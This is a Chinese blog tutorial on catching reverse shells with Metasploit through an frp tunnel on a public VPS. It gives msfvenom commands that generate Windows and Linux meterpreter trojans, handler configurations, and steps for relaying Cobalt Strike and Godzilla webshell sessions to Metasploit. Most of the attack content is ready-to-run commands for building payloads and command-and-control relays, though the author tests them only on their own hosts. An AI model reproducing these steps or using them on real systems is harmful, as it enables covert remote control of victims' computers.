首页 > 系统相关 >MSF反弹shell、与CS_哥斯拉联动

MSF反弹shell、与CS_哥斯拉联动

时间:2023-01-02 18:46:09浏览次数:71  
标签:shell 哥斯拉 xxx 端口 set CS msf payload

0x00-引言


看我不卷死你们.png

0x01-思路


公网vps启动frp,本地kali启动frp客户端,frp客户端配置将kali端口映射到vps某个端口,msf生成木马接收shell

0x02-msf反弹shell


01-frp配置

frp客户端配置,将本地1234端口映射到vps1080

[common]
server_addr = 1.xx.xx.xx  #这里是公网vps的ip
server_port = 6666          #这里的端口要跟服务端的一样

[msf]
type = tcp
local_ip = 127.0.0.1        
local_port = 1234          # 转发给本地的1234端口
remote_port = 1080         #服务端的1080端口转发给本地的1234端口

image.png
启动服务端(没截图),启动客户端
image.png

02-上线windows主机

msf生成windows木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=公网ip LPORT=1080 -f exe > /root/hacker.exe

image.png
msf开启监听

msfconsole
use exploit/multi/handler  #开启监听
set payload windows/meterpreter/reverse_tcp  #设置payload,选择漏洞利用模块
set LHOST 127.0.0.1  #本地IP,即攻击IP
set LPORT 1234  #监听端口
exploit  #攻击

windows10点击木马、成功上线
image.png
关闭木马进程

tasklist | findstr hacker
taskkill -f /pid 进程号

image.png

03-上线linux主机

msf生成linux木马

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf

image.png
开启监听

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost xxx.xxx.xxx.xxx
set lport 8888
exploit  #攻击

image.png
加权限运行木马-成功上线
image.png
查找hacker服务进程并kill
image.png

0x03-cs与msf联动


CS添加监听
image.png
kali msf设置监听

msfconsole
use exploit/multi/handler  #开启监听
set payload windows/meterpreter/reverse_http  #设置payload,选择漏洞利用模块
set LHOST 127.0.0.1  #本地IP,即攻击IP
set LPORT 12345  #监听端口
exploit  #攻击

image.png
CS中转发shell
新建会话
image.png
选择payload
image.png
MSF成功接收到shell
image.png
msf吊啊,cs的进程都给杀掉了,msf的shell还没挂
image.png
cs显示已挂
image.png

0x04-msf与哥斯拉联动


打开shell,如图
image.png
添加vps地址与端口,端口为kali映射的端口

use exploit/multi/handler #启用监听模块
set payload php/meterpreter/reverse_tcp #选择payload
set lhost 0.0.0.0
set lport 4444
run

image.png
成功
image.png

0x05-参考


https://www.bilibili.com/read/cv13762388/
http://events.jianshu.io/p/02582b971eb1

标签:shell,哥斯拉,xxx,端口,set,CS,msf,payload
From: https://www.cnblogs.com/peace-and-romance/p/17020330.html

相关文章

  • HTML/CSS
    HTML基本框架<!doctypehtml><html><head><metacharset="utf-8"><title>无标题文档</title></head> <body></body></html>段落标记:<p></p>预留格式(文本中......
  • 第20章_ CSS-练习
    ​  层叠样式表(英文全称:CascadingStyleSheets)是一种用来表现HTML(标准通用标记语言的一个应用)或XML(标准通用标记语言的一个子集)等文件样式的计算机语言。CSS不仅可......
  • 第20章_ CSS-练习
    ​  层叠样式表(英文全称:CascadingStyleSheets)是一种用来表现HTML(标准通用标记语言的一个应用)或XML(标准通用标记语言的一个子集)等文件样式的计算机语言。CSS不仅可......
  • Django框架:13、csrf跨站请求伪造、auth认证模块及相关用法
    Django框架目录Django框架一、csrf跨站请求伪造1、简介2、csrf校验策略form表单csrf策略ajax请求csrf策略3、csrf相关装饰器FBV添加装饰器方式CBV添加装饰器方式二、aut......
  • 引入,CSS的书写方式
    ​  【1】为什么要学习CSS?HTML画页面--》这个页面就是页面上需要的元素罗列起来,但是页面效果很差,不好看,为了让页面好看,为了修饰页面---》CSSCSS的作用:修饰HTML页面......
  • 引入,CSS的书写方式
    ​  【1】为什么要学习CSS?HTML画页面--》这个页面就是页面上需要的元素罗列起来,但是页面效果很差,不好看,为了让页面好看,为了修饰页面---》CSSCSS的作用:修饰HTML页面......
  • 4.CSS网页样式--DIV盒子模型
    实验原理css盒子模型(BoxModel)所有HTML元素可以看作盒子,在CSS中,"boxmodel"这一术语是用来设计和布局时使用。CSS盒子模型本质上是一个盒子,封装周围的HTML元素,它包括:......
  • csrf跨网站请求操作 auth表相关操作
    今日内容详细csrf跨站请求伪造#前戏 钓鱼网站:模仿一个正规的网站让用户再该网站上做操作但是操作结果会会影响用户正常的网站用户''' 在代码处做一些小操作就可......
  • csrf跨站请求CBV添加装饰器的多种方式
    今日内容概要csrf跨站请求伪造csrf相关校验策略CBV添加装饰器的多种方式auth认证模块BBS项目需求分析今日内容详细csrf跨站请求伪造钓鱼网站:模仿一个正规的......
  • 【低成本“上云”】华为云ECS,助力企业数字化转型!​
    近几年来,“数字化转型”这个话题频频登上各大热搜榜榜首的位置,这意味着:随着数字经济的蓬勃发展,利用数字技术赋能业务,已经成为每个企业必须面临的一次“大考”。如何实现降本......